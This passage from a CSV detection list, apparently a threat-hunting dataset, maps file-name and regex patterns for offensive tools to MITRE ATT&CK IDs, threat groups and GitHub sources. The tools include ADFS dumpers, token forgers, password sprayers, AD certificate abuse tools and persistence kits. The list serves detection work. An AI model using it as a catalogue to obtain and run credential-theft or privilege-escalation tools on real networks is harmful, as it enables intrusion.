fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","13801" "*\ADCollector3.sln*",".{0,1000}\\ADCollector3\.sln.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","13802" "*\ADCollector3\*",".{0,1000}\\ADCollector3\\.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","13803" "*\ADCS.ps1*",".{0,1000}\\ADCS\.ps1.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","13804" "*\adcs.py*",".{0,1000}\\adcs\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","13805" "*\ADCSCoercePotato\*",".{0,1000}\\ADCSCoercePotato\\.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","13806" "*\ADCSPwn*",".{0,1000}\\ADCSPwn.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","13807" "*\ADCSPwn.exe*",".{0,1000}\\ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","13808" "*\ADCSPwn.exe*",".{0,1000}\\ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","13809" "*\adcsync.py*",".{0,1000}\\adcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","13810" "*\add_computer.py*",".{0,1000}\\add_computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","13811" "*\add-admin.exe*",".{0,1000}\\add\-admin\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","13812" "*\addcomputer.py*",".{0,1000}\\addcomputer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","13813" "*\addcomputer_LDAP_spn.py*",".{0,1000}\\addcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13814" "*\addcomputer_with_spns.py*",".{0,1000}\\addcomputer_with_spns\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege 
Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13815" "*\add-filters-defender-crowdstrike.json*",".{0,1000}\\add\-filters\-defender\-crowdstrike\.json.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permitting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","13816" "*\Add-KeeThiefLurker.ps1*",".{0,1000}\\Add\-KeeThiefLurker\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","13817" "*\AddNewAdminUser.ahk*",".{0,1000}\\AddNewAdminUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","13818" "*\Add-RemoteRegBackdoor.ps1*",".{0,1000}\\Add\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - 
TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","13819" "*\AddScriptToRegistry.ahk*",".{0,1000}\\AddScriptToRegistry\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","13820" "*\AddTrustedDomain.py*",".{0,1000}\\AddTrustedDomain\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","13821" "*\AddTrustedDomain.vba*",".{0,1000}\\AddTrustedDomain\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","13822" "*\AddUser.dll*",".{0,1000}\\AddUser\.dll.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","13823" "*\AddUser.sln*",".{0,1000}\\AddUser\.sln.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of 
Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","13824" "*\ADeleg.exe*",".{0,1000}\\ADeleg\.exe.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","13825" "*\ADeleg.exe*",".{0,1000}\\ADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13826" "*\adeleg.pdb*",".{0,1000}\\adeleg\.pdb.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","13827" "*\adeleg\adeleg\*",".{0,1000}\\adeleg\\adeleg\\.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. 
It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","13828" "*\adeleg\winldap\*",".{0,1000}\\adeleg\\winldap\\.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","13829" "*\Adeleginator-main*",".{0,1000}\\Adeleginator\-main.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13830" "*\adeleg-main*",".{0,1000}\\adeleg\-main.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. 
It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","13831" "*\adfsbrute.py*",".{0,1000}\\adfsbrute\.py.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","0","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","13835" "*\ADFSDump.*",".{0,1000}\\ADFSDump\..{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","13836" "*\ADFSDump.exe*",".{0,1000}\\ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","13837" "*\ADFSDump.exe*",".{0,1000}\\ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","13838" "*\ADFSDump\*",".{0,1000}\\ADFSDump\\.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","13839" "*\ADFSDump\*",".{0,1000}\\ADFSDump\\.{0,1000}","offensive_tool_keyword","ADFSDump","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13840" "*\ADFSDump\*",".{0,1000}\\ADFSDump\\.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13841" "*\ADFSDump-master*",".{0,1000}\\ADFSDump\-master.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","13842" "*\ADFSDump-PS-main*",".{0,1000}\\ADFSDump\-PS\-main.{0,1000}","offensive_tool_keyword","ADFSDump-PS","ADFSDump to assist with GoldenSAML","T1078 - T1552.004 - T1558.004","TA0006 ","N/A","N/A","Credential Access","https://github.com/ZephrFish/ADFSDump-PS","1","0","N/A","N/A","10","1","31","8","2024-05-20T00:00:19Z","2024-05-19T00:46:28Z","13843" "*\ADFSpoof.py*",".{0,1000}\\ADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","13844" "*\ADFSpray*",".{0,1000}\\ADFSpray.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","13845" "*\ADFSRelay\*",".{0,1000}\\ADFSRelay\\.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. 
ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","13846" "*\adfs-spray.py*",".{0,1000}\\adfs\-spray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","13847" "*\adhunt.py*","\\adhunt\.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","13849" "*\adlogin.ps1*",".{0,1000}\\adlogin\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","13851" "*\adm2sys.py*",".{0,1000}\\adm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. 
This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","13853" "*\admin_persistence_winlogon*",".{0,1000}\\admin_persistence_winlogon.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","13854" "*\admin-panels.txt*",".{0,1000}\\admin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","13855" "*\ADPassHunt.pdb*",".{0,1000}\\ADPassHunt\.pdb.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13856" "*\ADPassHunt\*",".{0,1000}\\ADPassHunt\\.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13857" 
"*\adPEAS.ps1*",".{0,1000}\\adPEAS\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13858" "*\adPEAS_DomainPolicy.Sys*",".{0,1000}\\adPEAS_DomainPolicy\.Sys.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13859" "*\adPEAS_outputfile*",".{0,1000}\\adPEAS_outputfile.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13860" "*\adPEAS-Light.ps1*",".{0,1000}\\adPEAS\-Light\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13861" "*\adPEAS-main*",".{0,1000}\\adPEAS\-main.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and 
others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13862" "*\adPEAS-master*",".{0,1000}\\adPEAS\-master.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","13863" "*\ADSearch.exe*",".{0,1000}\\ADSearch\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","13868" "*\ADSearch.exe*",".{0,1000}\\ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","13869" "*\AdsMasquerade.ps1*",".{0,1000}\\AdsMasquerade\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 